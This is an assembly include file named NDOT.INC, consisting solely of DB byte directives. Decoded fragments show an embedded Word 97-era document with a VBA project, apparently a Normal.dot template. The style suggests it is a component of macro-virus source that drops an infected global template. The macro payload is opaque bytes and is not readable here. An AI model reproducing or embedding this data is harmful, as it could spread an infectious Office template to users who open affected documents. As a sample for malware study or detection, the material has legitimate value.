DB 0A0H,0B6H,0FFH,0FFH,00EH,002H,003H,002H,02AH,011H,002H,02AH,00CH,002H,008H
DB 003H,01BH,00CH,002H,0DEH,0D3H,046H,012H,024H,00AH,003H,003H,00FH,005H,0D5H
DB 0A4H,001H,080H,0B2H,080H,001H,000H,0D2H,079H,012H,011H,030H,02AH,002H,002H
DB 090H,009H,000H,000H,000H,070H,014H,006H,048H,003H,000H,082H,002H,000H,064H
DB 0E4H,004H,004H,000H,00FH,038H,000H,000H,01CH,000H,017H,01DH,0F2H,01BH,022H
DB 010H,063H,074H,005H,051H,000H,048H,000H,000H,040H,002H,000H,000H,00AH,006H
DB 002H,00AH,03DH,0ADH,002H,00AH,007H,002H,07CH,001H,014H,008H,006H,012H,080H
DB 000H,009H,002H,012H,080H,019H,0A2H,0DDH,0F2H,0CBH,00CH,002H,04AH,012H,03CH
DB 002H,00AH,016H,028H,02CH,000H,001H,039H,022H,036H,010H,022H,037H,03EH,002H
DB 019H,073H,092H,0EAH,092H,09BH,06FH,0C2H,0D5H,065H,050H,084H,082H,000H,00DH
DB 052H,0D2H,025H,05CH,000H,003H,062H,0BCH,047H,0F5H,0A6H,0B0H,034H,033H,030H
DB 02DH,022H,076H,000H,002H,004H,043H,000H,00AH,003H,002H,00EH,001H,012H,0F4H
DB 0A5H,023H,000H,032H,02EH,030H,023H,000H,010H,030H,023H,043H,03AH,000H,05CH
DB 057H,049H,04EH,044H,04FH,057H,092H,036H,053H,059H,053H,008H,000H,054H,045H
DB 04DH,082H,077H,054H,044H,04FH,04CH,045H,032H,02EH,010H,054H,04CH,042H,023H
DB 094H,000H,000H,008H,0F2H,07AH,000H,0F2H,08BH,061H,074H,022H,01DH,023H,000H
DB 02FH,000H,001H,016H,000H,007H,040H,020H,080H,002H,04DH,053H,000H,046H,023H
DB 0ADH,03EH,000H,00EH,021H,001H,006H,084H,09BH,045H,072H,004H,000H,000H,080H
DB 083H,09BH,02FH,000H,07AH,080H,009H,006H,070H,080H,001H,001H,046H,041H,046H
DB 000H,000H,035H,031H,034H,000H,031H,036H,032H,02DH,042H,038H,035H,033H,010H
DB 02DH,031H,031H,00AH,000H,044H,0F2H,04CH,039H,092H,01BH,034H,034H,034H,035H
DB 035H,033H,035H,00EH,034H,001H,048H,017H,000H,000H,046H,004H,033H,02EH,054H
DB 057H,044H,000H,023H,04DH,069H,063H,072H,06FH,073H,06FH,000H,000H,028H,066H
DB 074H,020H,002H,03DH,020H,000H,060H,020H,04FH,002H,062H,001H,0B0H,020H,000H
DB 001H,04CH,069H,062H,072H,061H,01CH,072H,079H,062H,0CBH,001H,01EH,050H,030H
DB 000H,090H,00DH,008H,000H,000H,013H,072H,002H,05FH,050H,033H,043H,032H,044H
DB 000H,044H,046H,038H,032H,02DH,043H,000H,000H,046H,045H,032H,037H,005H,050H
DB 041H,034H,01DH,050H,080H,04AH,050H,05CH,090H,056H,000H,00AH,042H,045H,05CH
DB 085H,028H,045H,058H,0A7H,028H,078H,0DCH,000H,077H,0DDH,083H,081H,095H,043H
DB 004H,002H,078H,04FH,033H,038H,044H,078H,082H,04FH,040H,075H,0B4H,015H,042H
DB 078H,02AH,098H,0C0H,02BH,080H,040H,08EH,0C4H,02CH,032H,000H,02CH,044H,0A2H
DB 0A5H,043H,02DH,035H,042H,046H,041H,092H,0D6H,030H,000H,000H,031H,042H,02DH
DB 042H,044H,045H,052H,035H,040H,078H,041H,041H,040H,077H,034H,0C0H,000H,000H
DB 002H,032H,001H,008H,055H,041H,052H,051H,055H,049H,056H,04FH,000H,053H,020H
DB 044H,000H,020H,045H,020H,050H,052H,04FH,000H,047H,052H,041H,04DH,041H,053H
DB 05CH,072H,0A3H,043H,052H,000H,000H,04FH,053H,04FH,046H,054H,000H,020H,04FH
DB 046H,046H,049H,043H,045H,05CH,001H,084H,000H,000H,001H,04DH,053H,04FH,039H
DB 037H,02EH,044H,00CH,04CH,04CH,048H,05CH,083H,025H,020H,000H,000H,038H,02EH
DB 030H,045H,092H,05CH,00FH,082H,0BFH,001H,000H,013H,0C2H,001H,08DH,004H,010H
DB 004H,09AH,019H,042H,0A8H,034H,0EFH,000H,06FH,063H,075H,06DH,032H,011H,01AH
DB 011H,04EH,004H,032H,000H,004H,000H,018H,040H,033H,054H,000H,068H,011H,040H
DB 038H,062H,0DAH,080H,08FH,063H,000H,075H,008H,002H,051H,000H,090H,062H,0D9H
DB 040H,0B6H,01CH,0C0H,006H,062H,0F4H,048H,042H,001H,031H,0C2H,0C4H,000H,000H
DB 0EBH,000H,0DCH,01EH,08BH,042H,002H,001H,005H,02CH,042H,01AH,08FH,09AH,022H
DB 042H,000H,009H,008H,00AH,02BH,042H,001H,010H,042H,001H,025H,08AH,01AH,0E1H
DB 02FH,0A2H,03EH,000H,003H,000H,0B0H,0C6H,0FEH,0FFH,009H,000H,0D3H,020H,007H
DB 01CH,001H,002H,009H,021H,002H,004H,004H,003H,010H,000H,000H,004H,08CH,006H
DB 08BH,07FH,000H,002H,069H,07FH,05DH,002H,084H,023H,075H,002H,02EH,00FH,049H
DB 006H,049H,049H,044H,03DH,022H,07BH,037H,037H,043H,036H,000H,086H,039H,038H
DB 041H,046H,02DH,044H,031H,039H,032H,013H,0F9H,022H,004H,043H,041H,034H,02DH
DB 016H,0F9H,084H,062H,034H,030H,002H,001H,07DH,022H,00DH,00AH,037H,0BAH,03DH
DB 00BH,076H,02FH,026H,048H,002H,01FH,004H,003H,00DH,080H,003H,00AH,04EH,061H
DB 06DH,065H,03DH,022H,037H,030H,046H,0DDH,002H,03AH,048H,065H,06CH,070H,043H
DB 06FH,0A0H,000H,06EH,074H,065H,078H,074H,003H,072H,030H,002H,013H,043H,04DH
DB 047H,03DH,022H,042H,038H,042H,080H,001H,041H,032H,037H,035H,044H,032H,042H
DB 00BH,004H,002H,01EH,044H,050H,042H,03DH,022H,037H,030H,000H,003H,037H,032H
DB 045H,046H,031H,030H,046H,030H,005H,004H,002H,018H,047H,043H,03DH,022H,032H
DB 038H,000H,009H,032H,041H,042H,037H,043H,038H,042H,038H,003H,004H,033H,037H
DB 002H,017H,00DH,00AH,05BH,048H,000H,000H,06FH,073H,074H,020H,045H,078H,074H
DB 065H,06EH,064H,065H,072H,020H,049H,06EH,066H,010H,000H,06FH,05DH,00DH,00AH
DB 008H,09CH,031H,03DH,07BH,033H,038H,033H,032H,044H,036H,034H,030H,009H,000H
DB 022H,081H,039H,030H,002H,0E6H,043H,046H,02DH,038H,045H,034H,033H,02DH,030H
DB 030H,041H,030H,000H,014H,043H,039H,031H,031H,030H,030H,035H,041H,07DH,03BH
DB 022H,08EH,03BH,008H,036H,030H,00DH,00AH,003H,083H,002H,05AH,062H,038H,06BH
DB 073H,070H,061H,063H,065H,002H,051H,00BH,0FAH,03DH,032H,037H,02CH,020H,003H
DB 004H,000H,0E0H,036H,032H,033H,02CH,020H,033H,037H,035H,02CH,020H,05AH,00DH
DB 00AH,01FH,0CEH,012H,07CH,004H,003H,0A3H,091H,01FH,0CEH,003H,015H,001H,000H
DB 001H,012H,0E2H,003H,0E2H,0FDH,043H,0B0H,006H,009H,002H,003H,015H,000H,0C0H
DB 004H,006H,018H,044H,000H,046H,01DH,002H,008H,017H,073H,06FH,020H,064H,06FH
DB 020H,036H,074H,066H,074H,020H,002H,093H,064H,0BCH,02AH,020H,000H,002H,038H
DB 062H,089H,003H,00CH,002H,027H,000H,022H,00EH,000H,003H,00CH,02EH,002H,00DH
DB 075H,023H,09BH,02EH,038H,0E0H,0FFH,000H,0F4H,039H,0B2H,071H,002H,046H,008H
DB 003H,00FH,09DH,056H,02AH,003H,07EH,00FH,004H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0BFH,082H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,005H,010H,001H,0B2H,0E6H,06FH,0A2H,046H,070H,000H,04FH,000H,062H,0E2H
DB 0E8H,0EFH,0D7H,008H,0EAH,00FH,009H,00FH,010H,006H,010H,012H,0B2H,012H,005H
DB 04AH,005H,006H,006H,017H,00FH,007H,00CH,010H,05BH,002H,00EH,06FH,002H,004H
DB 00FH,003H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H
DB 006H,007H,014H,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00BH,010H,005H,07AH,005H,006H,0FFH,01FH,00BH,018H,00FH,00CH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H,006H,007H,014H
DB 00FH,008H,00FH,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
;----------------------------------(NDOT.INC)---------------------------------